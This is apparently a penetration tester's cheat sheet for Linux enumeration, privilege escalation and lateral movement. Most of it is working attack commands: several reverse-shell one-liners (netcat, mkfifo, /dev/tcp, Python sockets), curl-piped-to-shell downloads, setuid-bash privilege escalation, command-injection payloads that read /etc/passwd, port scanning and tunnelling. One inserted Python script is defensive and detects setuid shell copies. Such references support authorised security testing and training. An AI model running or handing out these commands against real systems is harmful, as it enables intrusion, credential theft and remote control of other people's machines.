Sudo
Enumeration
Script
LinPeas
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Linux Smart Enumeration
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1
Metasploit
msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'
Docker
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O
File
Classic
/etc/passwd & /etc/shadow
Web roots: /www/html, /var/www, /srv/html, /usr/share/*
/etc/nginx/sites-available/default
/etc/apache2/sites-enabled/000-default.conf
Proc
/proc/ contains useful information about the processes that are currently running. For each process, /proc/[pid]/ holds:
cwd: link to the current working directory.
environ: values of the environment variables.
exe: link to the executable of this process.
fd: directory which contains all open file descriptors.
Command
# 2>&- closes stderr so permission-denied noise is dropped
find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
Reverse Shell
Server
reSH
# Client
resh ip 4444
# Server
resh 4444
Netcat
nc ip 4444 -e /bin/bash
Mkfifo
mkfifo /tmp/f; nc ip 4444 0</tmp/f | /bin/sh -i 2>&1 | tee /tmp/f
Dev
bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'
Python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
TTY Support
python3 -c 'import pty; pty.spawn("/bin/bash")'
script -qc /bin/bash /dev/null
rlwrap
rlwrap is a "readline wrapper", a small utility that uses the GNU Readline library to allow editing of keyboard input for any command. Useful when you cannot spawn a proper TTY.
# Receiving a connection from a reverse shell
rlwrap nc -lnvp port
# Connecting to the victim
rlwrap nc ip port
# Keep a real history and put all words seen on input and output on the completion list
rlwrap -r -f . nc ip port
Privilege Escalation
/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
chmod 4755 /bin/bash
bash -p
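A defender-side check for the setuid-shell trick above, added here as an example (not part of the original notes): it sweeps directories where a setuid/setgid file is almost never legitimate and flags any that are byte-identical copies of a system shell, so a renamed copy such as /tmp/bash_up is still caught. The directory and shell lists are assumptions to tune per host.

```python
import hashlib
import os
import stat

# Assumption: directories where a setuid/setgid file is almost never legitimate.
SUSPICIOUS_DIRS = ["/tmp", "/var/tmp", "/dev/shm", "/home"]
# Assumption: interpreters whose copies are the usual payload of the trick above.
REFERENCE_SHELLS = ["/bin/bash", "/bin/sh", "/bin/dash"]

def sha256_of(path, chunk=1 << 20):
    # Hash in chunks so large binaries are not read into memory at once.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def find_setid_files(roots):
    """[(path, filemode, uid)] for regular files under roots with the setuid or
    setgid bit set. Symlinks are neither followed nor reported."""
    findings = []
    for root in roots:
        for dirpath, _dirs, names in os.walk(root, followlinks=False):
            for name in names:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable: skip, do not abort the sweep
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    findings.append((path, stat.filemode(st.st_mode), st.st_uid))
    return findings

def shell_copies(paths, reference_shells=REFERENCE_SHELLS):
    """[(path, shell)] for paths byte-identical to a reference shell; a renamed
    copy such as /tmp/bash_up still matches because the comparison is by hash."""
    known = {sha256_of(s): s for s in reference_shells if os.path.isfile(s)}
    hits = []
    for path in paths:
        try:
            digest = sha256_of(path)
        except OSError:
            continue
        if digest in known:
            hits.append((path, known[digest]))
    return hits

if __name__ == "__main__":
    for path, shell in shell_copies([p for p, _, _ in find_setid_files(SUSPICIOUS_DIRS)]):
        print(f"ALERT: {path} is a setid copy of {shell}")
```

Run it from a cron job or an integrity-check pipeline; an empty result is the expected state on a clean host.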
FTP
Port: 21
File Transfer Protocol (FTP) is an Internet tool provided by TCP/IP. It transfers files from one computer to another by giving access to directories or folders on remote computers.
Scan
nmap --script ftp-* -p 21 ip
Download all files
wget -m --user=user --password=password ftp://ip
wget -m --user=anonymous --password=anonymous ftp://ip
Gdbserver
Port: 1337
Gdbserver is a program that makes it possible to debug other programs remotely. You need a copy of the program you want to debug on the target system.
$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file
Command Injection
;{cat,/etc/passwd}
; cat${IFS}/etc/passwd ;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "
GTFOBins - Bypass local security restrictions
Network
Netstat
Scan Port
for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2> /dev/null
Scan Ip
for i in {1..254}; do ( ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" & ); done
Port Forwarding
Chisel
# Install chisel
curl https://i.jpillora.com/chisel! | bash
# Example: 8000 -> 4444
# Attacker machine:
chisel server -p 4444 --reverse
# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000
SSH
ssh -L 8080:127.0.0.1:8080 user@ip
SCP
Download File
scp -P port user@192.168.1.ip:path .
Upload File
scp -P port file user@192.168.1.ip:path
Upload peda
scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda